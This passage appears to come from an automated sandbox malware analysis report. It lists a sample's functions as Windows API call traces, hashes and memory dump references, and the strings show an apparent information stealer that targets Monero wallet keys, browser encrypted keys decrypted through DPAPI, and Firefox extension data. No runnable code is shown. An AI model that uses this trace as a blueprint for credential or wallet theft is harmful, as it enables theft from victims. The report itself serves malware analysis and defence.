                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 268392614299d31eb2e6e3c326f09e400d7a2e9cd515302e39ac27849f4a9036
                          • Instruction ID: cb65f96fbfefb24f283b584e36ce234e07edb5bf48c144e250cdae337f7f415b
                          • Opcode Fuzzy Hash: 268392614299d31eb2e6e3c326f09e400d7a2e9cd515302e39ac27849f4a9036
                          • Instruction Fuzzy Hash: 2FE1D072810118ABDB05FBA4DCA2EEE733CAF24301F908159F557B6091EF746A4DCB66
                          Function 0012D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D481
                          • lstrlen.KERNEL32(00000000), ref: 0012D698
                          • lstrlen.KERNEL32(00000000), ref: 0012D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0012D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: fc17b68090d64dd29390136b2c389b9d493252ae4615b2ba67f3d320d8be6402
                          • Instruction ID: 8546b287c802621bc0cf6714b21197deadef3bb3b33ce0a4ca3b3e6efbb54fbf
                          • Opcode Fuzzy Hash: fc17b68090d64dd29390136b2c389b9d493252ae4615b2ba67f3d320d8be6402
                          • Instruction Fuzzy Hash: 1E911772910108ABDB05FBA4DC96EEE733CAF24305F908158F547B7091EF746A49CB62
                          Function 0012D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012D801
                          • lstrlen.KERNEL32(00000000), ref: 0012D99F
                          • lstrlen.KERNEL32(00000000), ref: 0012D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0012DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: adc5d87fa4b6d630dd6bfc1e6393d81b54b2abf743f1327c3952232ae7ddbf0c
                          • Instruction ID: 0fd299f3ae42378527bf85d0bacfe53e61d9c6e2c53855bfdf7dc01e62594fe6
                          • Opcode Fuzzy Hash: adc5d87fa4b6d630dd6bfc1e6393d81b54b2abf743f1327c3952232ae7ddbf0c
                          • Instruction Fuzzy Hash: 6B811572910118ABDB05FBA4DC96EEE733CAF24301F904568F547B7091EF746A09DBA2
                          Function 0012F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00141580,00140D92), ref: 0012F54C
                          • lstrlen.KERNEL32(00000000), ref: 0012F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                          • Instruction ID: b55d72606e14c63905c0263a9cf55cade023cdc2bec841cd2c73fbefa65b76a8
                          • Opcode Fuzzy Hash: 3bd715fe8655244bb68249ee062c14270563e4b2f26bef0abbe2a7a4ffccde74
                          • Instruction Fuzzy Hash: 1B51E171D10108ABDB04FBF4EC96DED7379AF64300F808568F956A7191EF346A19CBA2
                          Function 00133560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: efb45d82d467782c6df09295ca0aab25cb73ab3187078c22497121c27a78e8aa
                          • Instruction ID: 2b32859e5a04d0059d99c467dcc82f8fbf9882750328cd8e33d60c3be5d0f56c
                          • Opcode Fuzzy Hash: efb45d82d467782c6df09295ca0aab25cb73ab3187078c22497121c27a78e8aa
                          • Instruction Fuzzy Hash: 404172B1D10109AFCB04EFE5D886AFEB774AF58304F408418F51677251DB75AA09CFA6
                          Function 00129CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                            • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D39
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                            • Part of subcall function 00129AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                            • Part of subcall function 00129AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                            • Part of subcall function 00129AC0: LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                            • Part of subcall function 00129B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00129B84
                            • Part of subcall function 00129B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00129BA3
                            • Part of subcall function 00129B60: LocalFree.KERNEL32(?), ref: 00129BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 3112ef02bceb47c033068df752053ad57e084e232e991cc7df1039df942613db
                          • Instruction ID: 6bc474804d43d7b9a743fb275bb4b4449dae1366dbd174631add2e92c1197dfb
                          • Opcode Fuzzy Hash: 3112ef02bceb47c033068df752053ad57e084e232e991cc7df1039df942613db
                          • Instruction Fuzzy Hash: 9C3141B6D1021DABCF04DBE8EC85FEE77B8AF58304F144518E905A7241E7749A54CBA1
                          Function 001394D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 001394EB
                            • Part of subcall function 00138D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0013951E,00000000), ref: 00138D5B
                            • Part of subcall function 00138D50: RtlAllocateHeap.NTDLL(00000000), ref: 00138D62
                            • Part of subcall function 00138D50: wsprintfW.USER32 ref: 00138D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 001395AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 001395C9
                          • CloseHandle.KERNEL32(00000000), ref: 001395D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 299013be0226543dc58095c042bc90a3520e1d3fa3a5acea19095a7f056d2af1
                          • Instruction ID: 8e987732d45b8e9c08b1cc00a429c3009437ef5764be51de9f9f61335280c9bb
                          • Opcode Fuzzy Hash: 299013be0226543dc58095c042bc90a3520e1d3fa3a5acea19095a7f056d2af1
                          • Instruction Fuzzy Hash: 87310A71E00208AFDB15DBE0DD49BEDB778EF54700F108559E506AB184DBB4AA89CF52
                          Function 00138680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001405B7), ref: 001386CA
                          • Process32First.KERNEL32(?,00000128), ref: 001386DE
                          • Process32Next.KERNEL32(?,00000128), ref: 001386F3
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • CloseHandle.KERNEL32(?), ref: 00138761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                          • Instruction ID: daddc130a7366ff92a93d048a902fa16e988096b1ab6040cabcdab4ac9f762c1
                          • Opcode Fuzzy Hash: bf8071f652ef7841f4cc3299d500f7ed52a4139b731ab474d8aa5c6757a25477
                          • Instruction Fuzzy Hash: 96316871901218ABCB25EF90DC91FEEB778EF59700F5081A9F10AB21A0DB706A45CFA1
                          Function 00137980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00140E00,00000000,?), ref: 001379B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001379B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00140E00,00000000,?), ref: 001379C4
                          • wsprintfA.USER32 ref: 001379F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                          • Instruction ID: 691ec6cdae4f213b9700234fccd63293175673b5c5eca9f6645c2b8ea2915c06
                          • Opcode Fuzzy Hash: 5ba5530d34ab1190a7a4d648cc9913f2eba15daaf4dc5b1b4581749705702735
                          • Instruction Fuzzy Hash: D51118B2904518AACB149FC9ED45BBEBBFCEB48B11F10411AF605A2280D3795940CBB1
                          Function 001392E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00133AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00133AEE,?), ref: 001392FC
                          • GetFileSizeEx.KERNEL32(000000FF,00133AEE), ref: 00139319
                          • CloseHandle.KERNEL32(000000FF), ref: 00139327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
